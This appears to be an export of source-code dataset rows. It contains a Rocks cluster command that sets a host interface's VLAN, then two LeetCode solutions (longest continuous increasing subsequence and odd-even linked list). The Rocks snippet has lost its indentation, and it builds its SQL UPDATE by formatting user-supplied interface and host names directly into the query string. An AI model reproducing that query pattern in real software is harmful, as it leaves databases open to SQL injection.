<arg type='string' name='host' repeat='1'>
One or more named hosts.
</arg>
<arg type='string' name='iface'>
Interface that should be updated. This may be a logical interface or
the mac address of the interface.
</arg>
<arg type='string' name='vlan'>
The VLAN ID that should be updated. This must be an integer and the
pair 'subnet/vlan' must be defined in the VLANs table.
</arg>
<param type='string' name='iface'>
Can be used in place of the iface argument.
</param>
<param type='string' name='vlan'>
Can be used in place of the vlan argument.
</param>
<example cmd='set host interface vlan compute-0-0-0 eth0 3'>
Sets compute-0-0-0's private interface to VLAN ID 3.
</example>
<example cmd='set host interface vlan compute-0-0-0 subnet=eth0 vlan=3
'>
Same as above.
</example>
<related>add host</related>
"""
def run(self, params, args):
(args, iface, vid) = self.fillPositionalArgs(
('iface', 'vlan'))
if not len(args):
self.abort('must supply host')
if not iface:
self.abort('must supply iface')
if not vid:
self.abort('must supply vlan')
else:
try:
vlanid = int(vid)
except:
self.abort('vlan "%s" must be an integer' %
(vid))
for host in self.getHostnames(args):
self.db.execute("""update networks net, nodes n
set net.vlanid = IF(%d = 0, NULL, %d)
where (net.device = '%s' or net.mac='%s') and
n.name = '%s' and net.node = n.id""" %
(vlanid, vlanid, iface, iface, host))
| [
"[email protected]"
] | |
9896ed4a15946204d46a0faecec93ee19b1562de | 15373eaa353e8aece47a26741b7fb27795268bf6 | /easy/674_longest_continuous_increasing_subsequence.py | ef6d6b79c989164a5d0abafb804820ca0af2c060 | [] | no_license | esddse/leetcode | e1a9bacf04c68a8d642a1e53c90e6c2dda2c1980 | 0ceccdb262149f7916cb30fa5f3dae93aef9e9cd | refs/heads/master | 2021-06-08T19:15:14.346584 | 2020-01-09T01:41:23 | 2020-01-09T01:41:23 | 109,675,590 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | class Solution:
def findLengthOfLCIS(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if not nums:
return 0
N = len(nums)
dp = [1] * N
max_len = 1
for i in range(1, N):
if nums[i] > nums[i-1]:
dp[i] = dp[i-1] + 1
max_len = max(max_len, dp[i])
return max_len | [
"[email protected]"
] | |
c78fca675d5676273ac2feefb58558b427a6339b | 74e53273dc5aa71293a385512b3d239971099738 | /Data_structures_and_Algorithms/linked_list/odd_even_linked_list.py | 23a4c71690de5d036acb1edf0b4d3ec4ea4b1b76 | [] | no_license | BJV-git/Data_structures_and_Algorithms | 3b240bf699e7091453f3a1459b06da1af050c415 | 393c504b2bb17b19e76f6d9d9cce948b4c12dbb2 | refs/heads/master | 2020-04-23T22:32:22.525542 | 2019-02-19T16:09:51 | 2019-02-19T16:09:51 | 171,504,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 418 | py | # just about the positional ordering
# just can go by the next.next and set the odd last to even head
def odd_even(head):
if not head or not head.next: return head
odd =head
even = head.next
evenhead = head.next
while even and even.next:
odd.next = odd.next.next
odd = odd.next
even.next = even.next.next
even = even.next
odd.next = evenhead
return head | [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.